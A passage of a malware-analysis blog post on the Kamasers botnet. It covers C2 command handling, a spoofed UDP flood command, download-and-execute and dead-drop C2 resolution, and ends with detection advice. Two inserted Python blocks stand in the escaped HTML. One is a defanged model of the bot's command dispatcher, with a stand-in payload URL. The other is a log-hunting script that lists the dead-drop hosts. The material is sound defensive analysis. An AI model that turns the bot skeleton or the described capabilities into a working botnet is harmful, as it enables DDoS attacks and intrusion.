https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/sandbox_analysis_kamasers-740x416.png 740w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/sandbox_analysis_kamasers.png 1842w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><figcaption 
class=\"wp-element-caption\"><em>ANY.RUN\u2019s analysis session used as a starting point for technical investigation<\/em>&nbsp;<\/figcaption><\/figure><\/div>\n\n\n<p>This was followed by reverse engineering of the binary. The analysis focused primarily on how the malware receives and processes commands from the C2 server, as well as the attack capabilities implemented in the sample.&nbsp;<\/p>\n\n\n\n<p>After&nbsp;launch, the malware first locates its C2 server through a&nbsp;<strong>Dead Drop Resolver<\/strong>&nbsp;mechanism. It uses public services such as&nbsp;<strong>GitHub Gist, Telegram, Dropbox, and Bitbucket<\/strong>&nbsp;as intermediary sources. From these sources, the bot extracts the address of the real C2 server and then&nbsp;establishes&nbsp;a connection to it; only after that connection is up does it start receiving commands.&nbsp;<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"901\" height=\"411\" src=\"\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/imageb-2.png\" alt=\"The bot validates the format of the command sent by the C2 server\" class=\"wp-image-19475\" srcset=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/imageb-2.png 901w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/imageb-2-300x137.png 300w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/imageb-2-768x350.png 768w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/imageb-2-370x169.png 370w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/imageb-2-270x123.png 270w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/imageb-2-740x338.png 740w\" sizes=\"(max-width: 901px) 100vw, 901px\" \/><figcaption class=\"wp-element-caption\"><em>The bot&nbsp;validates&nbsp;the format of the command sent by the C2 server<\/em><\/figcaption><\/figure><\/div>\n\n\n<p>Command processing takes place in several stages. 
First, the bot verifies that the command format is valid. All valid commands must begin with the \u201c!\u201d character. If this prefix is missing, the command is rejected and not executed.&nbsp;<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full is-resized\"><img loading=\"lazy\" decoding=\"async\" width=\"901\" height=\"604\" src=\"\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/imagec-2.png\" alt=\"Code for the handler caching mechanism\u00a0\" class=\"wp-image-19476\" style=\"width:516px;height:auto\" srcset=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/imagec-2.png 901w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/imagec-2-300x201.png 300w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/imagec-2-768x515.png 768w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/imagec-2-370x248.png 370w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/imagec-2-270x181.png 270w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/imagec-2-740x496.png 740w\" sizes=\"(max-width: 901px) 100vw, 901px\" \/><figcaption class=\"wp-element-caption\"><em>Code for the handler caching mechanism<\/em>&nbsp;<\/figcaption><\/figure><\/div>\n\n\n<p>After&nbsp;validating&nbsp;the prefix, the bot matches the command against an internal handler table. The analysis showed that&nbsp;Kamasers&nbsp;uses&nbsp;a&nbsp;<strong>handler caching mechanism<\/strong>. If the previously used handler matches the current command index, the bot takes a fast path without performing another&nbsp;lookup. 
Otherwise, it triggers the dynamic resolution routine.&nbsp;<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full is-resized\"><img loading=\"lazy\" decoding=\"async\" width=\"901\" height=\"565\" src=\"\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/imaged-1.png\" alt=\"Pseudocode of the flowchart showing command receipt and handler caching\" class=\"wp-image-19477\" style=\"width:584px;height:auto\" srcset=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/imaged-1.png 901w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/imaged-1-300x188.png 300w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/imaged-1-768x482.png 768w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/imaged-1-370x232.png 370w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/imaged-1-270x169.png 270w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/imaged-1-740x464.png 740w\" sizes=\"(max-width: 901px) 100vw, 901px\" \/><figcaption class=\"wp-element-caption\"><em>Pseudocode of the flowchart showing command receipt and handler caching<\/em><\/figcaption><\/figure><\/div>\n\n\n<p>This mechanism can be briefly described as shown in the pseudocode above.&nbsp;<\/p>\n\n\n\n<p>One of the most illustrative commands is !udppro. It implements a high-speed UDP flood with support for source IP spoofing. 
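Before looking at the !udppro implementation, the three stages just described (prefix check, handler-table lookup with a cached fast path, execution with a status message back to the C2) can be modelled end to end. The block below is an added example written for this article, not code from the sample, from its pseudocode screenshot, or from ANY.RUN. The page does not describe the bot-to-C2 transport or the argument layout of individual commands, so commands arrive here as plain strings and the layout "!udppro <host> <port> <seconds>" is an assumption for illustration only; the !descargar alias is the Spanish name for !download that appears later in the article. Nothing is sent anywhere: the flood handler only registers a task, and the loader stops after the MZ/PE header check that precedes section mapping.

```python
"""Model of the Kamasers command pipeline described in this section (added
example, not code from the sample, its pseudocode or ANY.RUN). The article
gives neither the bot-to-C2 transport nor the argument layout of commands, so
commands arrive as plain strings and "!udppro <host> <port> <seconds>" is an
assumed layout. Nothing is sent anywhere: the flood handler only registers a
task and the loader stops after the MZ/PE header check."""
import struct
from dataclasses import dataclass, field
from typing import Callable, Dict, List, Optional, Tuple


@dataclass
class Bot:
    fetch: Callable[[str], bytes]                     # injected so the example runs offline
    reports: List[str] = field(default_factory=list)  # status messages sent back to the C2
    tasks: List[str] = field(default_factory=list)    # attack tasks that would be running
    lookups: int = 0                                  # slow-path handler-table resolutions
    cached: Optional[Tuple[str, Callable]] = None     # last (command, handler) pair

def parse_command(raw: str) -> Optional[Tuple[str, List[str]]]:
    """Stage 1: format validation. No '!' prefix means the command is dropped."""
    raw = raw.strip()
    if not raw.startswith("!") or len(raw) < 2:
        return None
    name, *args = raw[1:].split()
    return name.lower(), args

def is_pe_image(buf: bytes) -> bool:
    """MZ and PE signature checks a loader makes before mapping sections."""
    if len(buf) < 0x40 or buf[:2] != b"MZ":
        return False
    e_lfanew = struct.unpack_from("<I", buf, 0x3C)[0]
    return buf[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"

def h_stop(bot: Bot, args: List[str]) -> None:
    count = len(bot.tasks)
    bot.tasks.clear()                                 # "terminates attack threads"
    bot.reports.append(f"stopped: {count} task(s) terminated")

def h_download(bot: Bot, args: List[str]) -> None:
    """Download & Execute, modelled up to (not including) the execution step."""
    try:
        data = bot.fetch(args[0])
    except Exception as exc:                          # network error -> failure notification
        bot.reports.append(f"download failed: {exc}")
        return
    if not is_pe_image(data):
        bot.reports.append("download failed: not a PE image")
        return
    bot.reports.append(f"download ok: {len(data)} bytes")   # real bot maps sections, jumps to EP

def h_udppro(bot: Bot, args: List[str]) -> None:
    """Assumed layout: host, port, seconds. Validates, then only registers the task."""
    try:
        host, port, seconds = args[0], int(args[1]), int(args[2])
        if not (0 < port < 65536 and seconds > 0):
            raise ValueError
    except (IndexError, ValueError):
        bot.reports.append("udppro rejected: bad arguments")
        return
    bot.tasks.append(f"udppro {host}:{port} {seconds}s")
    bot.reports.append(f"udppro task queued: {host}:{port} for {seconds}s")

HANDLERS: Dict[str, Callable] = {"stop": h_stop, "download": h_download,
                                 "descargar": h_download,   # Spanish alias of !download
                                 "udppro": h_udppro}

def dispatch(bot: Bot, raw: str) -> bool:
    """Stages 2 and 3: resolve the handler (cached fast path first) and run it."""
    parsed = parse_command(raw)
    if parsed is None:
        return False                                  # rejected, nothing executed
    name, args = parsed
    if bot.cached is not None and bot.cached[0] == name:
        handler = bot.cached[1]                       # same command as last time: no lookup
    else:
        bot.lookups += 1                              # dynamic resolution through the table
        handler = HANDLERS.get(name)
        if handler is None:
            bot.reports.append(f"unknown command: {name}")
            return False
        bot.cached = (name, handler)
    handler(bot, args)
    return True

# Constructed "downloads": a 256-byte buffer with a valid MZ/PE header, and an error page.
_pe = bytearray(0x100)
_pe[:2], _pe[0x80:0x84] = b"MZ", b"PE\x00\x00"
struct.pack_into("<I", _pe, 0x3C, 0x80)             # e_lfanew -> offset of the PE signature
FILES = {"http://payload.example/a.exe": bytes(_pe),
         "http://payload.example/b.exe": b"<html>404</html>"}

def fake_fetch(url: str) -> bytes:
    if url not in FILES:
        raise ConnectionError("unreachable")
    return FILES[url]

def run_session(lines: List[str]) -> Bot:
    """Feed one C2 'conversation' to a fresh bot and return it for inspection."""
    bot = Bot(fetch=fake_fetch)
    for line in lines:
        dispatch(bot, line)
    return bot

if __name__ == "__main__":
    s = run_session(["!udppro 203.0.113.5 53 30", "!download http://payload.example/a.exe", "!stop"])
    print("\n".join(s.reports), f"\ntable lookups: {s.lookups}")
```

The `lookups` counter is what makes the caching visible: two consecutive `!udppro` commands cost one table resolution, while a rejected or unknown command never updates the cache, so the next valid command pays for a lookup again. The same structure is useful the other way round when writing a C2 emulator for sandbox detonation, because the bot's status strings ("task completed" versus the failure notification) are the only feedback an operator sees.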
Code analysis shows the standard sequence for creating a UDP socket via the&nbsp;<strong>WinSock API<\/strong>&nbsp;using the AF_INET, SOCK_DGRAM, and IPPROTO_UDP parameters.&nbsp;<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"901\" height=\"222\" src=\"\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/imagee-1.png\" alt=\"Disassembled code for the \u201c!udppro\u201d command\u00a0\" class=\"wp-image-19478\" srcset=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/imagee-1.png 901w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/imagee-1-300x74.png 300w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/imagee-1-768x189.png 768w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/imagee-1-370x91.png 370w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/imagee-1-270x67.png 270w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/imagee-1-740x182.png 740w\" sizes=\"(max-width: 901px) 100vw, 901px\" \/><figcaption class=\"wp-element-caption\"><em>Disassembled code for the \u201c!udppro\u201d command<\/em>&nbsp;<\/figcaption><\/figure><\/div>\n\n\n<p>After initializing the socket, the malware configures the&nbsp;packet&nbsp;transmission parameters. The&nbsp;<strong>IP spoofing<\/strong>&nbsp;option is what makes&nbsp;<strong>reflection<\/strong>&nbsp;and&nbsp;<strong>amplification<\/strong>&nbsp;attacks through public&nbsp;<strong>NTP<\/strong>&nbsp;and&nbsp;<strong>DNS<\/strong>&nbsp;servers possible: the bot writes the victim\u2019s address into the source field of each request, so the reflector\u2019s response, which is significantly larger than the request, is delivered to the victim rather than to the bot, leading to a sharp increase in load. One caveat when assessing this capability: a socket created with SOCK_DGRAM has no control over its source address, and since Windows XP SP2 the stack also refuses to send UDP datagrams with a forged source address over raw sockets, so spoofed floods from a Windows host need a raw socket plus a third-party driver or a comparable bypass. Without one, an infected corporate machine floods with its own real address, which is exactly what makes the IP blacklisting and reputational risk described above concrete.&nbsp;&nbsp;<\/p>\n\n\n\n<p>The&nbsp;<em>!download&nbsp;<\/em>command is also present, implementing a&nbsp;<strong>Download &amp; Execute<\/strong>&nbsp;mechanism. 
The bot retrieves an executable file from the specified URL, checks for the MZ signature,&nbsp;allocates&nbsp;memory, maps the sections, and transfers execution to the entry point. If successful, it sends a task completion message; if an error occurs, it generates a failure notification.&nbsp;<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"901\" height=\"387\" src=\"\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/imagef-1.png\" alt=\"Bot status messages related to the download process\u00a0\" class=\"wp-image-19479\" srcset=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/imagef-1.png 901w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/imagef-1-300x129.png 300w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/imagef-1-768x330.png 768w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/imagef-1-370x159.png 370w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/imagef-1-270x116.png 270w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/imagef-1-740x318.png 740w\" sizes=\"(max-width: 901px) 100vw, 901px\" \/><figcaption class=\"wp-element-caption\"><em>Bot status messages related to the download process<\/em>&nbsp;<\/figcaption><\/figure><\/div>\n\n\n<h3 class=\"wp-block-heading\">Implementation of Dead Drop Resolver&nbsp;Channels<\/h3>\n\n\n\n<p>Kamasers&nbsp;uses four&nbsp;<strong>Dead Drop Resolver<\/strong>&nbsp;channels:&nbsp;<strong>GitHub Gist<\/strong>, a&nbsp;<strong>Telegram bot<\/strong>, a file hosted on&nbsp;<strong>Dropbox<\/strong>, and a&nbsp;<strong>Bitbucket<\/strong>&nbsp;repository. Importantly, links to these services are not stored in the sample in plain form. 
Instead, they are constructed and unpacked dynamically at runtime, which is why such strings do not appear during static analysis of the binary; they are best recovered from a sandbox run or from a memory dump taken after the unpacking routine has executed.&nbsp;<\/p>\n\n\n\n<p>The&nbsp;<strong>Dead Drop Resolver (DDR)<\/strong>&nbsp;mechanism serves as an intermediary layer between the bot and the primary C2 server. After&nbsp;launch, the malware sends HTTP GET requests to the public resources in a fixed order, starting with GitHub Gist. The content hosted there&nbsp;contains&nbsp;the current address of the command-and-control server. Once a response is received, the bot extracts the C2 address and&nbsp;establishes&nbsp;a direct connection to continue receiving commands.&nbsp;<\/p>\n\n\n\n<p>If the first source returns a valid address, no further requests are made.&nbsp;If the connection fails or the response is invalid, the bot automatically falls back to the next channel:&nbsp;<strong>Telegram<\/strong>, then&nbsp;<strong>Dropbox<\/strong>, and finally&nbsp;<strong>Bitbucket<\/strong>.&nbsp;<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"901\" height=\"198\" src=\"\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image10.png\" alt=\"DDR links in the\u00a0Kamasers\u00a0codebase\u00a0\" class=\"wp-image-19480\" srcset=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image10.png 901w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image10-300x66.png 300w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image10-768x169.png 768w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image10-370x81.png 370w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image10-270x59.png 270w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image10-740x163.png 740w\" sizes=\"(max-width: 901px) 100vw, 901px\" \/><figcaption class=\"wp-element-caption\"><em>DDR links in 
the&nbsp;Kamasers&nbsp;codebase<\/em>&nbsp;<\/figcaption><\/figure><\/div>\n\n\n<p>All of&nbsp;these resources&nbsp;ultimately point&nbsp;to the same C2 infrastructure:&nbsp;<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"901\" height=\"325\" src=\"\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image11.png\" alt=\"GitHub Gist content used by\u00a0Kamasers\u00a0as DDR\u00a0\" class=\"wp-image-19481\" srcset=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image11.png 901w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image11-300x108.png 300w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image11-768x277.png 768w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image11-370x133.png 370w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image11-270x97.png 270w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image11-740x267.png 740w\" sizes=\"(max-width: 901px) 100vw, 901px\" \/><figcaption class=\"wp-element-caption\"><em>GitHub Gist content used by&nbsp;Kamasers&nbsp;as DDR<\/em>&nbsp;<\/figcaption><\/figure><\/div>\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full is-resized\"><img loading=\"lazy\" decoding=\"async\" width=\"901\" height=\"159\" src=\"\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image12-1.png\" alt=\"Bitbucket content used by Kamasers as DDR \" class=\"wp-image-19482\" style=\"width:440px;height:auto\" srcset=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image12-1.png 901w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image12-1-300x53.png 300w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image12-1-768x136.png 768w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image12-1-370x65.png 370w, 
https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image12-1-270x48.png 270w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image12-1-740x131.png 740w\" sizes=\"(max-width: 901px) 100vw, 901px\" \/><figcaption class=\"wp-element-caption\"><em>Bitbucket content used by&nbsp;Kamasers&nbsp;as DDR<\/em>&nbsp;<\/figcaption><\/figure><\/div>\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"901\" height=\"141\" src=\"\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image13.png\" alt=\"Fallback domains used if the DDR links are unavailable\" class=\"wp-image-19483\" srcset=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image13.png 901w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image13-300x47.png 300w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image13-768x120.png 768w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image13-370x58.png 370w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image13-270x42.png 270w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image13-740x116.png 740w\" sizes=\"(max-width: 901px) 100vw, 901px\" \/><figcaption class=\"wp-element-caption\"><em>Fallback domains used if the DDR links are unavailable<\/em><\/figcaption><\/figure><\/div>\n\n\n<p>If none of the&nbsp;<strong>DDR channels<\/strong>&nbsp;responds, the malware falls back to a built-in list of backup domains.&nbsp;<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Catching&nbsp;Kamasers&nbsp;Early: A Practical Detection Approach&nbsp;<\/h2>\n\n\n\n<p>Kamasers&nbsp;shows how a single malware infection can quickly turn into a broader business problem. 
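The Dead Drop Resolver chain described in the previous section is itself a detection opportunity, and one that does not depend on knowing the current dead-drop URLs (which are unpacked only at runtime and can be rotated by the operator). Each of the services involved is legitimate on its own; the signal is one non-browser process contacting several of them in quick succession, in the bot's fixed failover order, and then opening a direct connection to a bare IP address, the C2 it has just resolved. The following is an added example, not code from the article, the sample, or ANY.RUN's products: the proxy log layout, host names, process names, the 120-second window and the "two or more services" threshold are constructed assumptions to be adapted to your own telemetry.

```python
"""Hunting for Dead Drop Resolver (DDR) behaviour in proxy logs.

Added example, not code from the article, the sample or ANY.RUN. The log
layout, host names, process names, the 120-second window and the "two or
more services" threshold are constructed assumptions; adapt the parser and
the host list to your own telemetry. Every DDR service is legitimate on its
own; the signal is one non-browser process walking several of them in quick
succession and then opening a direct connection to a bare IP address."""
from collections import defaultdict
from datetime import datetime, timedelta
from ipaddress import ip_address
from typing import Dict, List, Tuple

# Public services the article names as DDR channels, grouped by service.
DDR_HOSTS: Dict[str, str] = {
    "gist.github.com": "github_gist",
    "gist.githubusercontent.com": "github_gist",
    "api.telegram.org": "telegram",
    "www.dropbox.com": "dropbox",
    "dl.dropboxusercontent.com": "dropbox",
    "bitbucket.org": "bitbucket",
    "api.bitbucket.org": "bitbucket",
    "api.etherscan.io": "etherscan",
}
BROWSERS = {"chrome.exe", "msedge.exe", "firefox.exe"}
WINDOW = timedelta(seconds=120)

# Constructed proxy log: timestamp, client, process, destination, port.
SAMPLE_LOG = """\
2026-03-20T09:00:01 WS-042 chrome.exe gist.github.com 443
2026-03-20T09:00:05 WS-042 chrome.exe www.dropbox.com 443
2026-03-20T09:01:10 WS-042 chrome.exe 93.184.216.34 443
2026-03-20T09:14:02 WS-017 updater.exe gist.github.com 443
2026-03-20T09:14:03 WS-017 updater.exe api.telegram.org 443
2026-03-20T09:14:04 WS-017 updater.exe www.dropbox.com 443
2026-03-20T09:14:05 WS-017 updater.exe bitbucket.org 443
2026-03-20T09:14:07 WS-017 updater.exe 203.0.113.77 8080
2026-03-20T10:30:00 WS-017 updater.exe gist.github.com 443
2026-03-20T11:02:00 WS-099 backup.exe www.dropbox.com 443
2026-03-20T11:02:03 WS-099 backup.exe 198.51.100.9 443
"""

def parse_line(line: str) -> Tuple[datetime, str, str, str, int]:
    ts, client, proc, dest, port = line.split()
    return datetime.fromisoformat(ts), client, proc.lower(), dest.lower(), int(port)

def is_bare_ip(dest: str) -> bool:
    """A literal IP as destination: no DNS name, typical of a freshly resolved C2."""
    try:
        ip_address(dest)
        return True
    except ValueError:
        return False

def detect_ddr_chains(log_text: str, window: timedelta = WINDOW,
                      min_services: int = 2) -> List[Tuple[str, str, Tuple[str, ...], str]]:
    """Return (client, process, services in contact order, c2) for each suspicious chain."""
    per_process = defaultdict(list)
    for line in log_text.strip().splitlines():
        ts, client, proc, dest, port = parse_line(line)
        per_process[(client, proc)].append((ts, dest, port))

    alerts = []
    for (client, proc), events in per_process.items():
        if proc in BROWSERS:                  # a browser visiting these sites is normal
            continue
        events.sort()
        for i, (t0, dest, _) in enumerate(events):
            if dest not in DDR_HOSTS:
                continue                      # a chain can only start at a DDR service
            seen: Dict[str, datetime] = {}    # service -> first contact, insertion-ordered
            c2 = None
            for ts, d, p in events[i:]:
                if ts - t0 > window:
                    break
                if d in DDR_HOSTS:
                    seen.setdefault(DDR_HOSTS[d], ts)
                elif is_bare_ip(d) and len(seen) >= min_services:
                    c2 = f"{d}:{p}"           # direct connection right after the dead drops
                    break
            if c2:
                alerts.append((client, proc, tuple(seen), c2))
                break                         # one alert per process is enough
    return alerts

if __name__ == "__main__":
    for client, proc, services, c2 in detect_ddr_chains(SAMPLE_LOG):
        print(f"{client} {proc}: DDR chain {' -> '.join(services)} then C2 {c2}")
```

On the constructed log only WS-017 fires: the browser on WS-042 is excluded by process, and WS-099 touches a single service before its direct connection, which is ordinary backup-client behaviour. The order of services in the alert tuple is the order of first contact, so a hit that reproduces the documented Gist, Telegram, Dropbox, Bitbucket sequence is a strong indicator even before the destination IP has been enriched with threat intelligence.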
Beyond DDoS activity, the botnet can also download and execute&nbsp;additional&nbsp;payloads, increasing the risk of deeper compromise.&nbsp;<\/p>\n\n\n\n<p>For security teams, the challenge is not only spotting the malware&nbsp;itself but&nbsp;also understanding whether an infected host is being used for external attacks, communicating with resilient C2 infrastructure, or pulling in follow-on payloads.&nbsp;<\/p>\n\n\n\n<p>Early detection depends on moving quickly from suspicious network activity to confirmed malicious behavior.&nbsp;<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">1. Monitoring: Spot Malicious Infrastructure and Unusual Network Behavior Early&nbsp;<\/h3>\n\n\n\n<p>Kamasers&nbsp;relies on external infrastructure to receive commands, retrieve C2 addresses, and in some cases download&nbsp;additional&nbsp;payloads. It also uses public services such as GitHub Gist, Telegram, Dropbox, Bitbucket, and even&nbsp;Etherscan&nbsp;as part of its Dead Drop Resolver logic.&nbsp;<\/p>\n\n\n\n<p>Monitoring for&nbsp;suspicious outbound connections, newly observed infrastructure, and repeated communication with known malicious hosting can help teams detect activity before the infection leads to larger operational impact.&nbsp;<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"466\" src=\"\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image17-1024x466.png\" alt=\"Actionable IOCs delivered by TI\u00a0Feeds\u00a0to your existing stack\u00a0\" class=\"wp-image-19484\" srcset=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image17-1024x466.png 1024w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image17-300x136.png 300w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image17-768x349.png 768w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image17-370x168.png 370w, 
https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image17-270x123.png 270w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image17-740x337.png 740w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image17.png 1425w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><figcaption class=\"wp-element-caption\"><em>Actionable IOCs delivered by TI&nbsp;Feeds&nbsp;to your existing stack<\/em>&nbsp;<\/figcaption><\/figure><\/div>\n\n\n<p>ANY.RUN\u2019s&nbsp;<a href=\"https:\/\/any.run\/threat-intelligence-feeds\/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=kamasers-technical-analysis&amp;utm_term=250326&amp;utm_content=linktotifeedslanding\" target=\"_blank\" rel=\"noreferrer noopener\">Threat Intelligence Feeds<\/a>&nbsp;help&nbsp;surface suspicious indicators early, giving SOC teams faster visibility into malicious domains, IPs, and infrastructure patterns linked to emerging threats.&nbsp;<\/p>\n\n\n\n<!-- Regular Banner START -->\n<div class=\"regular-banner\">\n<!-- Text Content -->\n<p class=\"regular-banner__text\">\n<span class=\"highlight\">99% unique\n<\/span>threat data for your SOC <br>Catch attacks <span class=\"highlight\">early<\/span> to\u00a0protect your business &nbsp;   \n<\/p>\n<!-- CTA Link -->\n<a class=\"regular-banner__link\" id=\"article-banner-regular\" href=\"https:\/\/any.run\/threat-intelligence-feeds\/?utm_source=anyrunblog&#038;utm_medium=article&#038;utm_campaign=kamasers-technical-analysis&#038;utm_term=250326&#038;utm_content=linktotifeedslanding#contact-sales\" rel=\"noopener\" target=\"_blank\">\nIntegrate TI Feeds\n<\/a>\n<\/div>\n<!-- Regular Banner END -->\n<!-- Regular Banner Styles START -->\n\n<style>\n.regular-banner {\ndisplay: flex;\ntext-align: center;\nflex-direction: column;\nalign-items: center;\ngap: 1.5rem;\nwidth: 100%;\npadding: 2rem;\nmargin: 1.5rem 0;\nborder-radius: 0.5rem;\nfont-family: 'Catamaran Bold';\nmargin-inline: auto;\nbackground: 
rgba(32, 168, 241, 0.1);\nborder: 1px solid rgba(75, 174, 227, 0.32);\n}\n\n.regular-banner__text {\nfont-size: 1.5rem;\nmargin: 0;\n}\n\n.highlight {\ncolor: #ea2526;\n}\n\n.regular-banner__link {\npadding: 0.5rem 1.5rem;\nfont-weight: 500;\ntext-decoration: none;\nborder-radius: 0.5rem;\ncolor: #FFFFFF;\nbackground-color: #1491D4;\ntext-align: center;\ntransition: all 0.2s ease-in;\n}\n\n.regular-banner__link:hover {\nbackground-color: #68CBFF;\ncolor: white;\n}\n<\/style>\n<!-- Regular Banner Styles END -->\n\n\n\n<h3 class=\"wp-block-heading\">2. Triage: Confirm Botnet Activity with Behavior-Based Analysis&nbsp;<\/h3>\n\n\n\n<p>With threats like&nbsp;Kamasers, static detection alone may not show the full risk. A suspicious file may appear inconclusive until its real behavior is&nbsp;observed&nbsp;during execution.&nbsp;<\/p>\n\n\n\n<p>Running the sample inside the&nbsp;<a href=\"https:\/\/any.run\/features\/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=kamasers-technical-analysis&amp;utm_term=250326&amp;utm_content=linktosandboxlanding\" target=\"_blank\" rel=\"noreferrer noopener\">ANY.RUN&nbsp;interactive&nbsp;sandbox<\/a>&nbsp;makes it possible to confirm the full execution flow, including:&nbsp;<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>retrieval of C2 data through Dead Drop Resolver channels&nbsp;<\/li>\n\n\n\n<li>connection to the active command-and-control server&nbsp;<\/li>\n\n\n\n<li>receipt and execution of DDoS commands&nbsp;<\/li>\n\n\n\n<li>download-and-execute behavior through 